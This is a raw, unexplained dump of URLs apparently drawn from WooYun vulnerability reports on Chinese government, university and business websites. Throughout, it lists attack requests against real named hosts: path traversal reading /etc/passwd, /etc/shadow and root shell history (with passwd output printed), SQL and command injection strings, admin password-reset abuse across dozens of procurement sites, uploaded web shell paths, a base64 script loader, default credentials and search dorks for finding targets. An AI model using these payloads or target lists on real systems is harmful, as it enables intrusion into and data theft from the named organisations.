http://120.132.144.28/ajax/colorsize.php?action=size&id=3382&color=%E6%B7%A1%E9%9B%85%E7%B4%AB http://120.132.144.28/ajax/colorsize.php?action=size&id=3382&color=%E6%B7%A1%E9%9B%85%E7%B4%AB http://www.isoffice.cn/Web/Index/WebDetail/customer http://oa.ahxf.gov.cn/nzyd/show.asp?ID=20387 http://www.familymart.com.cn/brand/newsDetail?id= http://jiwei.dongying.gov.cn/ www.wanxinsoft.com http://www.wanxinsoft.com/product1_1.asp http://sys.zafu.edu.cn:81/ http://210.27.176.162/ http://sys.zafu.edu.cn/dy/ http://202.114.168.176/ http://59.69.101.10/ http://202.114.168.176/model/TwoGradePage/NewsMore.aspx?columnId=97 http://202.114.168.176/model/TwoGradePage/devTrans.aspx?devcode=DL000001 
http://202.114.168.176/model/TwoGradePage/LookShiYanShi.aspx?LID=292&columnId=98 http://202.114.168.176/model/TwoGradePage/NewsMore.aspx?columnId=97 http://www.anmai.net/anmai/oa/adduser.aspx?id=1 https://1.202.234.22/admin/singlelogin.php?submit=1&loginId=1 https://1.202.234.22/admin/list_ipAddressPolicy.php?GroupId=1 http://m.tiantian.com/login/userRegTwo?Ajax_CallBack=true Content-type:application/x-www-form-urlencoded http://pan.baidu.com/s/1eQd4I9W#dir/path=%2Fkodexplorer https://1.202.234.22/debug/show_logfile.php?filename=/Isc/Log/proxy.log;ls%20-al http://so.sdey.net/topic.php?id=18 http://202.113.60.9/lib/main/information_open.asp?id=1101 http://rczp.tyut.edu.cn/xtgl/index_sessionOut.html http://202.202.160.39:8021/zftal-hrm/xtgl/login_loginpage.html http://ywxt.suoyuan.com.cn/zftal-hrm/xtgl/login_loginpage.html http://hr.tjtc.edu.cn/zftal-hrm/xtgl/login_loginpage.html http://zp.shafc.edu.cn/xtgl/login_loginpage.html http://rs.wtc.edu.cn:8021/zftal-hrm/xtgl/login_loginpage.html http://todo.pigai.org/ http://bazhong.wxcs.cn http://www.notery.net http://www.xyfg.gov.cn/ http://www.erdostjgzc.com/page.asp?id=612 http://www.hhhtgzc.com/page.asp?id=620 http://www.erdoszxgzc.com/page.asp?id=630 http://www.kqgzc.com/page.asp?id=589 http://www.fygzc.cn/page.asp?id=397 http://sggzccn.cnc506.000pc.net/page.asp?id=594 https://182.151.203.168/por/login_psw.csp http://www.wxxzbjy.com/ http://**.**.** http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ http://**.**.**/ ttp://**.**.**/dpm ttp://**.**.** http://iqxxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000314&sid=315001 http://**.**.** http://**.**.** http://42.99.16.149:8080/WX_CUST_WEBSERVICE/wapSelf/wapSelfAction.do?action=packageUseChange&openID=0&menuID=&flowID=&flowParam=&platform=YX&telephone=18912345678 http://gxy.sicnu.edu.cn http://mail.csztv.com/webmail/getPass1.php?email=zzz@csztv.com&update=s 
http://mail.csztv.com/webmail/client/cache/1663/14111168401.jpg/1.php http://www.envsc.cn/applyonline/login/Index.aspx http://www.envsc.cn/schedulingplatform/PlatformLogin/login.html http://wap.chinaiiss.com/touch/pk http://202.199.184.9/ http://www.fxzxyy.com/newsShow.Asp?id=482 http://www.hrbsdsyy.com/xw.asp?txtKeyword=1 http://www.rwsk.zjut.edu.cn/xwzx/xwzx.asp?new_sort=1 http://zulg.zju.edu.cn/display.php?menu=1&c_menu=5 http://zulg.zju.edu.cn/display.php?c_menu=20 http://zulg.zju.edu.cn/phpinfo.php http://122.102.2.10:8081/webgis/login.aspx http://61.155.9.52/webgis/login.aspx http://www.asiot.com/) http://www.strongsoft.net/ http://cose.seu.edu.cn/onews.asp?id=2010 http://www.jisu8.cn/ http://www.jisu8.cn/game/h.php?ip= http://www.lerye.com/case.asp http://www.lerye.cn/case.asp www.szshuntong.cn/data/web.mdb www.szzel.com/data/web.mdb www.shcwine.com/data/web.mdb www.yunyvision.com/data/web.mdb www.szxmjy.com/data/web.mdb www.xiangshanmall.com/data/web.mdb www.cipon.net/data/web.mdb www.qmgg.com.cn/data/web.mdb www.oulang.net/data/web.mdb www.asieris.cn/data/web.mdb www.lemsz.com/data/web.mdb www.sunrous.com/data/web.mdb www.jssgui.com/data/web.mdb www.jsyl155.com/data/web.mdb www.tzhpmy.com/data/web.mdb www.sz-sjbx68.com/data/web.mdb www.txhengrui.com/data/web.mdb euweili.w28.mc-test.com/data/web.mdb www.txjybg.com/data/web.mdb www.szwsxn.com/data/web.mdb www.szxyyt.com/data/web.mdb www.txbjnjb.com/data/web.mdb http://www.lenovostoreapp.com/ http://www.hao360.cn/plus/comments_list.php?id=15730 inurl:IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoshan/IndexViewController.do?method=index http://www.hszgj.cn/IndexViewController.do?method=index http://kszfcg.gov.cn/IndexViewController.do?method=index http://www.szzfcg.gov.cn/IndexViewController.do?method=index http://www.ydzfcg.gov.cn/IndexViewController.do?method=index http://ztb.taihe.gov.cn/IndexViewController.do?method=index http://www.qdkfqcg.gov.cn/IndexViewController.do?method=index 
http://www.fcxzfcg.gov.cn/IndexViewController.do?method=index http://www.lbzfcg.gov.cn/IndexViewController.do?method=index http://cgzx.ahzfcg.gov.cn/IndexViewController.do?method=index http://www.tlzbcg.com/IndexViewController.do?method=index http://www.sxzfcg.gov.cn/IndexViewController.do?method=index http://www.sixianzfcg.gov.cn/IndexViewController.do?method=index http://222.216.4.8/IndexViewController.do?method=index http://www.jimozfcg.cn/IndexViewController.do?method=index http://www.jzzfcg.gov.cn/IndexViewController.do?method=index http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/IndexViewController.do?method=index http://www.hnzfcg.gov.cn/IndexViewController.do?method=index http://www.mczb.gov.cn/IndexViewController.do?method=index http://hscgw.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/yeji/IndexViewController.do?method=index http://www.lazfcg.gov.cn/jinan/IndexViewController.do?method=index http://www.lazfcg.gov.cn/shucheng/IndexViewController.do?method=index http://www.lazfcg.gov.cn/IndexViewController.do?method=index http://www.lazfcg.gov.cn/huoqiu/IndexViewController.do?method=index http://lbzfcg.gov.cn/IndexViewController.do?method=index http://mczb.gov.cn/IndexViewController.do?method=index http://zfcg.mccz.gov.cn/IndexViewController.do?method=index http://caigou.pingdu.gov.cn/IndexViewController.do?method=index http://zfcg.laoshan.gov.cn:88/IndexViewController.do?method=index http://www.aqzfcg.gov.cn/IndexViewController.do?method=index http://www.yqzfcg.cn/IndexViewController.do?method=index http://www.cngpc.com/IndexViewController.do?method=index http://lazfcg.gov.cn/IndexViewController.do?method=index http://60.171.34.186/IndexViewController.do?method=index http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=1 http://xxx.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin 
http://www.lazfcg.gov.cn/huoshan/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.hszgj.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://kszfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.szzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.ydzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://ztb.taihe.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.qdkfqcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.fcxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lbzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://cgzx.ahzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.tlzbcg.com/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.sxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.sixianzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://222.216.4.8/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.jimozfcg.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.jzzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://218.22.70.134:85/IndexViewController.do?method=toLogin http://www.xxzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.hnzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.mczb.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://hscgw.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/yeji/UserSecurityController.do?method=getPassword&step=2&userName=admin 
http://www.lazfcg.gov.cn/jinan/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/shucheng/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.lazfcg.gov.cn/huoqiu/UserSecurityController.do?method=getPassword&step=2&userName=admin http://lbzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://mczb.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://zfcg.mccz.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://caigou.pingdu.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://zfcg.laoshan.gov.cn:88/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.aqzfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.yqzfcg.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.cngpc.com/UserSecurityController.do?method=getPassword&step=2&userName=admin http://lazfcg.gov.cn/UserSecurityController.do?method=getPassword&step=2&userName=admin http://60.171.34.186/UserSecurityController.do?method=getPassword&step=2&userName=admin http://www.0730edu.cn/new_list.php?id=15331, http://www.0730edu.cn/admin/index.php http://www.sh-cloud.com http://www.sh-cloud.com/uploads/Users_Company_img/2014092012140351498.jsp http://www.sh-cloud.com/findProductListByName.act http://skypearl.csair.com/skypearl/cn/toPrintCard.action?memberNo=3139105509XX(匿了) http://skypearl.csair.com/skypearl/cn/getAccountPassword.action?&NOSSL http://218.193.224.21/fckeditor/editor/filemanager/browser/default/connectors/test.html http://218.193.224.21/UserFiles/File/aspx1.aspx http://xyh.fdzcxy.com/ListNew.aspx?type=1 http://library.fdzcxy.com http://xxxy.xtu.edu.cn/index.php/Departments/index/id/1/ http://www.tianji.com/ce/results http://118.145.12.169/ 
http://a.tbcdn.cn/sys/common/icon/rank/b_3_1.gif http://baike.baidu.com/view/3427522.htm?fr=aladdin inurl:newshare.aspx http://lib.ntu.edu.cn/menu_detail.jsp?id=16&iType_id=1 http://192.168.1.1/goform/Diagnosis?pingAddr=|echo http://192.168.1.1/goform/Diagnosis?pingAddr=192.168.1.100 Login:User:admin Mac:00:21:6b:13:6e:ac http://www.hunanfish.com/nshow.asp?id=680 http://www.rcwl.net/b/tea/bag_detail.jsp?hasChildType=1&typeId=1 http://www.7stars.net.cn/ http://www.7stars.net.cn/successful%20case.html site:gov.cn inurl:Person/Per_Search_Advance.aspx http://www.7stars.net.cn/ http://www.7stars.net.cn/successful%20case http://ywdw.jtonline.cn/njits/ http://58.18.141.140/jingwutong/index.php?m=Admin&c=Short&a=index&type=zong&id= http://www.ccgp-shandong.gov.cn/fin_info/site/index.jsp右侧看到很多链接,其中 http://123.233.119.251:8083/sdgp/logon.jsp http://60.216.5.87/expinfo/logon.jsp www.chesudi.com/的ERP后台 http://emall.life.cntaiping.com/mobile/download?sAction=loadIos&appType=5 http://learn.open.com.cn/Inquiry/View.aspx?QueryID=534&ResourceType=R1&ResourceCode=23859035-DD61-4C02-AB27-59190ABBC524 http://learn.open.com.cn/ http://www.hk.cntaiping.com任意文件读取 http://www.hk.cntaiping.com/include/getfile.php?file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&filepath=download%2F http://www.hk.cntaiping.com/include/getfile.php?filename=55&file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&filepath=download%2F at:x:25:25:Batch daemon:/var/spool/atjobs:/bin/bash bin:x:1:1:bin:/bin:/bin/bash daemon:x:2:2:Daemon:/sbin:/bin/bash ftp:x:40:49:FTP account:/srv/ftp:/bin/bash games:x:12:100:Games account:/var/games:/bin/bash gdm:x:50:104:Gnome daemon:/var/lib/gdm:/bin/false haldaemon:x:101:102:User haldaemon:/var/run/hal:/bin/false lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false man:x:13:62:Manual viewer:/var/cache/man:/bin/bash messagebus:x:100:101:User D-BUS:/var/run/dbus:/bin/false 
mysql:x:60:106:MySQL admin:/var/lib/mysql:/bin/bash named:x:44:44:Name daemon:/var/lib/named:/bin/false news:x:9:13:News system:/etc/news:/bin/bash nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash ntp:x:74:103:NTP daemon:/var/lib/ntp:/bin/false postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false root:x:0:0:root:/root:/bin/bash sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false suse-ncc:x:102:105:Novell User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash uucp:x:10:14:Unix-to-Unix system:/etc/uucp:/bin/bash wwwrun:x:30:8:WWW apache:/var/lib/wwwrun:/bin/false webapp:x:1001:100:webapp:/srv/www/htdocs:/bin/bash http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://192.168.1.101/KPPW/index.php?do=user&view=message&op=detail&type=private&intPage=1&msgId=16 http://www.centit.com/ http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ&adminType=FWBM http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001&adminType=FWBM_INFO http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1'%20and%20'1'='2&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/info/infomation.do?method=list_index&type=1'%20and%20'1'='1&no_=11&columnID_SEARCH_=11&columnName=通知公告&top_type=TZGG# http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ'%20and%20'1'='1&adminType=FWBM 
http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=JS070700CZ'%20and%20'1'='2&adminType=FWBM http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001'%20and%20'1'='1&adminType=FWBM_INFO http://www.ldzsc.gov.cn/lynet-sj/individualCenter/main_center.jsp?topGroup=D&no=JS070700CZ-CF-0001'%20and%20'1'='2&adminType=FWBM_INFO http://218.92.49.74:8090/ganyunet/manage/supPower.do?method=viewAttc&sort_id=1412 http://www.ldzsc.gov.cn/manage/supPower.do?method=viewAttc&sort_id=94 http://218.92.50.139:8082/lygdhnet/manage/supPower.do?method=viewAttc&sort_id=1824 http://218.92.62.78/gnnet/manage/supPower.do?method=viewAttc&sort_id=1330 http://gk.ganyu.gov.cn:8090/ganyunet/manage/supPower.do?method=viewAttc&sort_id=1413 http://221.226.37.243:8080/sunnet/manage/supPower.do?method=viewAttc&sort_id=6 http://223.100.97.168/login.action http://ac.ppdai.com/userbind/setsafequestion http://123.125.84.73:8080/ http://service.caijing.com.cn/admin/adminusermanage/login/ http://www.hhsyy.com/run.php?partid=103 http://gzkg.e21.cn.login/login1.php?id=3 http://gzkg.e21.cn.login/login1.php?id=3 http://www.gdwh.com.cn/gdwhzyz/index.php http://www.nchbj.gov.cn/mail/index.asp http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111"--tamper http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111"--tamper http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111 http://www.rcwl.net/webschool/Book/class_comm.jsp?orderBy=111 http://oa.xndxfz.com/webschool/Book/class_comm.jsp?orderBy=111 http://oa.dhssx.com/webschool/Book/class_comm.jsp?orderBy=111 http://oa.bashu.com.cn/webschool/Book/class_comm.jsp?orderBy=111 http://www.cqxjwxx.com.cn/webschool/Book/class_comm.jsp?orderBy=111 http://ltzx.zhedu.net.cn/webschool/Book/class_comm.jsp?orderBy=111 http://www.wxzzyey.com/webschool/Book/class_comm.jsp?orderBy=111 http://ww1980.cqjjzx.com/webschool/Book/class_comm.jsp?orderBy=111 http://www.wdlinux.cn 
http://demo.kesion.com/ask/q.asp?id=115 http://baike.baidu.com/view/1351295.htm http://www.yantai.gov.cn/cn/content/facility_yt/shzn/guide/index_lb_xs.jsp?id=80504&flags_id=16764 http://sha.sinotrans.com/jcms/m_5_b/selmulti_column.jsp?type=1 http://www.ylsy.edu.cn/ http://rw.ylsy.edu.cn http://fzxy.ylsy.edu.cn http://hxx.ylsy.edu.cn/ http://dxxy.ylsy.edu.cn/ http://zyx.ylsy.edu.cn/ http://sxx.ylsy.edu.cn/ http://tyxy.ylsy.edu.cn/ http://jyjs.ylsy.edu.cn/ http://wyx.ylsy.edu.cn/ http://wlxy.ylsy.edu.cn/ http://ysxy.ylsy.edu.cn/ http://zygb.ylsy.edu.cn/dhlm/jgsz/jxdw/ http://wyx.ylsy.edu.cn/ http://wyx.ylsy.edu.cn/news/html/index.php?id=518 http://nic.ylsy.edu.cn/admin/ http://nic.ylsy.edu.cn/index.php?mid=1 http://sxx.ylsy.edu.cn/base/admin/index.php http://yjsc.ylsy.edu.cn/admin/xyeWebEditor/admin/login.asp http://yjsc.ylsy.edu.cn/news.asp?id=52 http://yjsc.ylsy.edu.cn/admin/xycms.asp http://xbbj.ylsy.edu.cn/admin.php http://xbbj.ylsy.edu.cn/news/html/index.php?id=511 http://www.haitiansoft.com:8080/ http://road.hncc.edu.cn/About/About.asp?ID=8 http://road.hncc.edu.cn/WebAdmin/index.asp http://app.eduuu.com/wulijs/search.php http://www.cittc.org/ http://ipic.jittc.org/IPICMeeting/LogOn http://www.z2hospital.com/cms/do_search.aspx?gjz=1&lmid= http://web.nsu.edu.cn/webpage/7d1fecc7-71b9-405e-85c0-5503ceb2f806.asp?SS= http://10.nsu.edu.cn/list.aspx?c_id=4 http://itbm.ccniit.com/Class.aspx?id=9 http://www.ccniit.com/topics/topics.rar http://www.ccniit.com/HTML/intro/intro.rar http://www.ccniit.com/t.rar http://www.ahujhc.cn/include/web_content.php?id=6109 http://res1.wingontravel.com/pdf/main.php?tour_code=JSC05U http://61.145.231.45:6543/web1/tzgg.asp?id=257 https://member.meizu.com/uc/system/webjsp/member/activeMail?userId=2&token=8cd83ddebb17df68 BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...6 BSoftNew.svc/GetUserPasswordByCheckCode?messagetype=1&checkcode=7358&mobile=156...手机号省略...6 
BSoftNew.svc/Login?username=156...省略...6&DevID=8...省略...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun8899&DevVer=4.2.2 BSoftNew.svc/GetMobileCheckCode?istaivextype=true&mobile=156...手机号省略...7 BSoftNew.svc/AddMobileUser?password=pentest&checkcode=5821&mobile=156...手机号省略...7 http://autosite.idcs.cn/webmall/query.php?catid=27 http://autosite.idcs.cn/webmall/query.php?typeid=6 http://autosite.idcs.cn/news/class/index.php?catid=1&myord=dtime&myshownums=20&key=企业&imageField.x=28&imageField.y=9 http://autosite.idcs.cn/news/class/?76*1.html http://autosite.idcs.cn/news/class/?76*2.html伪静态盲注 http://autosite.idcs.cn/webmall/query.php?catid=27为例: http://www.ntzyy.com/showDzqkdo!showqtDzbknpList.do?stauts=2014%C4%EA%B5%DA01%C6%DA http://www.78888888.cn/fwxm.php?id=1 http://222.210.17.165/selects.asp http://222.210.17.165/index.asp http://mall.ecitic.com/MallWeb.zip http://sys.zs91.com/进入到系统内部,发现之前已近有白帽进行了通报,并且厂商已经进行了部分的封堵。但是通过观察和深入理解业务,才发现并非如此啊 http://www.haitiansoft.com:8080/ http://www.nc1y.com/yywh.asp?p=188&dir=253 http://www.sunlinks.cn http://www.sunlinks.cn/%E7%94%A8%E6%88%B7%E6%A1%88%E4%BE%8B.aspx http://www.jnszz.com.cn http://www.jnszz.com.cn http://www.jnszz.com.cn:8080/ http://www.jn27z.net:8090/ http://www.jnszjy.net/weboa/login.aspx http://www.jnxzzx.cn/weboa/ http://oa.jnbeitan.com/ http://oa.cqedu.com.cn/ http://oa.xiaolizhongxue.com/ http://www.lyxedu.net:8888/ http://www.jnfls.com:8080/ http://www.tqjy.com.cn:8080/ site:edu.cn http://61.233.9.66/svn/ http://61.233.9.66/svn/web/src/mail.ini http://61.233.9.66/svn/web/src/Core.properties http://61.233.9.66/svn/web/branch/V1.0/src/com/bean/BJSmsBean.java http://www.cfcpn.com/的 http://www.cfcpn.com/pzweb/admin/这个目录下的文件基本都存在未授权访问的问题 http://www.cfcpn.com/pzweb/admin/idea.jsp http://www.cfcpn.com/pzweb/admin/password.jsp直接列出了密码 http://www.cfcpn.com/common/download.jsp内容如下 http://www.cfcpn.com/common/download.jsp?file_path=/upload/../WEB-INF/&file_name=web.xml即可下载web.xml文件 data:text/html;base64 
http://10.65.10.70/shell.js data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzEwLjY1LjEwLjcwL3NoZWxsLmpzID48L3NjcmlwdD4= http://www.wanxinsoft.com/product1_1.asp http://www.wanxinsoft.com/product1_3.asp http://202.206.48.106/model/TwoGradePage/NewsMore.aspx?columnId=211 http://202.206.48.106/model/TwoGradePage/CIntroduce.aspx?columnId=191 http://202.206.48.106/model/TwoGradePage/NewsMore.aspx?columnId=211 http://www.wanxinsoft.com/product1_1.asp http://www.wanxinsoft.com/product1_3.asp http://182.129.150.10:8001/ http://sgjxsyzx.ecust.edu.cn/ http://61.132.139.110:8888/ http://59.69.101.10/ http://www.dzgc.cdut.edu.cn/ http://202.206.48.106/ http://aacc.cumt.edu.cn/ http://lysyzx.hqu.edu.cn/ http://210.33.29.49/ http://222.204.208.4/ http://emlab.usst.edu.cn/ http://202.120.50.200/ http://hzhlab.hytc.edu.cn/ http://lab.hutc.zj.cn:8090/ http://dgdz.xzit.edu.cn http://labch.cumt.edu.cn:81/ http://lab.hutc.zj.cn:8070/ http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?id=132&columnid=70 http://lab.hutc.zj.cn:8090/model/twogradepage/newsdetail.aspx?id=132&columnid=70 http://www.wanxinsoft.com/product1_1.asp http://www.wanxinsoft.com/product1_3.asp http://182.129.150.10:8001/ http://sgjxsyzx.ecust.edu.cn/ http://61.132.139.110:8888/ http://59.69.101.10/ http://www.dzgc.cdut.edu.cn/ http://202.206.48.106/ http://aacc.cumt.edu.cn/ http://lysyzx.hqu.edu.cn/ http://210.33.29.49/ http://222.204.208.4/ http://emlab.usst.edu.cn/ http://202.120.50.200/ http://hzhlab.hytc.edu.cn/ http://lab.hutc.zj.cn:8090/ http://dgdz.xzit.edu.cn http://labch.cumt.edu.cn:81/ http://lab.hutc.zj.cn:8070/ http://202.206.48.106/model/TwoGradePage/LookShiYanShi.aspx?LID=1127&columnId=203 http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?id=45023&openid=86&columnId=203 http://202.206.48.106/model/TwoGradePage/NewsEquipment.aspx?id=45023&openid=86&columnId=203 http://123.58.188.207:8081/ http://app.cmiea.org/agency.php?q=1%27%22 
https://personalbank.cib.com.cn/pers/main/resources/js/CIB_Plugin.exe http://www.sdzydfy.com/web/sCMS.asp?typeid=2 http://211.100.17.7/pics/201308/8bd49a31-7247-476c-a5a7-f90fb7a76cc2.jsp http://www.wenjuan.com http://center.tkfy.kongzhong.com/user/get_user_server?account= http://ss.linekong.com/morei.php?sort_id=126 http://ss.linekong.com/morei.php?sort_id=126&page=1 http://ss.linekong.com/game_datum/freshman/novice.php?sort_id=154 http://appbg.xiaoma.com/users/sign_in http://ws.gxfy.gov.cn/doc/xxfb/show/read_newsbig.php?NEWS_ID=182835&FY_ID=127 http://3g.hzrc.com/Qz/PGetPassWord.aspx http://www.baiyue.net/cn/news_info.aspx?id=261&cid=66 http://app.suning.com/android/dev/registry?step=2 http://app.suning.com/upload/img/idpic/20140922/541ff8654fda58891822292eb538cd87ef85683b0cf822a8132ca4.php http://223.252.196.130/common/web_meeting/index.php此站存在注射 http://wooyun.org/bugs/wooyun-2010-061504 http://223.252.196.130:80//common/web_meeting/index.php?module=modify_meeting_info http://1dui1.huatu.com/index.php/FaceList/index/?province=14 http://o2o.homevv.com/jpl_special/?special_cat=4 http://oa.sohu-inc.com/EmployeeLogin.aspx http://download.coolyun.com/php.php http://www.haas.cn/newsview.aspx?id=1504 http://www.xtxt.heagri.gov.cn http://www.xtbx.heagri.gov.cn http://www.xtgz.heagri.gov.cn http://www.xtlc.heagri.gov.cn http://www.xtlx.heagri.gov.cn http://www.xtly.heagri.gov.cn http://www.xtng.heagri.gov.cn http://www.xtnq.heagri.gov.cn http://www.xtnj.heagri.gov.cn http://www.xtpx.heagri.gov.cn http://www.xtqh.heagri.gov.cn http://www.xtrx.heagri.gov.cn http://www.xtsh.heagri.gov.cn http://www.xtnh.heagri.gov.cn http://www.jlswj.net/houtai/login.asp admin:admin888 http://www.jlswj.net/houtai/,直接进入后台,无需登陆; https://itunes.apple.com/in/app/uc-browser-fastest-mobile/id586871187?mt=8 http://new.houtai.juwan.cn/PhoneAssistantServer/html/login.php http://bizcn.com/newticket?module=showimage&fileNmae=/home.jsp http://42.99.16.16:8080/productmanager/ 
http://218.80.215.200:8080/pms/MainAction.do http://218.80.215.200:8080/pms/index.jsp?type=workSheet http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/passwd http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../etc/shadow http://218.80.215.200:8080/pms/CommonFileDownloadAction.do?fileName=../../../../../root/.bash_history http://ads.meilishuo.com/welcome/tuanLogin http://202.203.209.15/ynumis/ https://itunes.apple.com/cn/app/sou-gou-liu-lan-qi-wan-mei/id548608066?mt=8 http://www.hzdgxx.org/index.aspx?PageGuid=581D1489-7B9B-4C80-9794-22E87FB5AF66&CatalogID=925 http://www.hzchcx.com/index.aspx?pageguid=0DD4737E-FE13-4BC6-BADD-DD4692B5E1DE&catalogID=216 http://www.hzxxsy.com/index.aspx?pageGuid=2722D5AF-1ED8-4852-B69B-52538739715E&CatalogID=1027 http://www.hzbwxx.com/index.aspx?pageguid=6EA5D084-7513-49ED-B3AF-8A6DAB8082F3&catalogID=77 http://61.175.193.70:99/index.aspx?pageGuid=21B7FBA5-5396-484C-8B1F-A3B7723D7BE8&CatalogID=1263 http://www.hzdgxx.org/index.aspx?PageGuid=581D1489-7B9B-4C80-9794-22E87FB5AF66&CatalogID=925为例 http://segmentfault.com/blog/simapple_on_segmentfault/1190000000689343 https://1.1.1.1/audit/123baobiao.php http://admin.xxx.gov.cn/general/ http://www.zjrzfy.gov.cn/ http://www.zjzy.gov.cn/ http://www.jsjrfy.gov.cn/ http://www.njng.gov.cn/ http://www.jsrepc.com/ http://www.sundy-whcy.com/ http://www.njlsjjjc.gov.cn/溧水纪检监察网 http://www.jzscxh.com/ http://www.jnkjj.gov.cn/江宁科技局 http://www.jszlyy.com.cn/江苏省肿瘤医院 http://cxy.jnkjj.gov.cn/江宁区产学研合作信息网 http://admin.zjrzfy.gov.cn/general/index.php http://ah.118100.cn/cring/jsp/user/shop_moregif www.cnet.com.cn用的程序是phpcmsv9 http://cou.cnet.com.cn/此网站居然是phpcmsv9的演示站, http://www.fivesoft.com.cn/ http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://mail.156.cn/ http://mail.156.cn/auth/step1.action http://mail.156.cn/css.jsp http://demo.cmseasy.cn/ 
http://demo.cmseasy.cn/index.php?case=archive&act=orders&aid=18 http://demo.cmseasy.cn/index.php?case=archive&act=orders&oid=20140923175406 http://localhost/index.php?case=archive&act=orders&oid=20140923180320-0-0- www.rscxw.com:9496 http://app.caijing.com.cn/?app=contribution&controller=panel&action=index http://www.taishanyy.com/html/show-ybyk.asp?id=2311 http://www.haitiansoft.com:8080/ http://www.gnun.edu.cn/cc.asp http://192.168.1.116/admin/index.php?lfj=mysql&action=out inurl:ntbookretrtopshowright.aspx http://ms.xijing.edu.cn/newsbrow.asp?stype=&type='&id=618 http://www.xaasj.com/newsbrow.asp?stype=&type='&id=1229 http://www.haitiansoft.com:8080/ http://www.asp168.com/default.php http://www.asp168.com/default.php?mod=article&fid=40 http://www.baidu.com/s?wd=Powered%20by%20AppCMS%20&rsv_spt=1&issp=1&f=8&rsv_bp=0&ie=utf-8&tn=baiduhome_pg&rsv_enter=0&rsv_n=2&rsv_sug3=1&rsv_sug4=976&inputT=1591 http://www.jxpost.com.cn/netsearch/ http://www.jxpost.com.cn/netsearch/ http://gysxx.wljt.sc.sgcc.com.cn/template.do?method=previewnav&sid=/v8AMQAwADYANA==(四川电力物资公司) 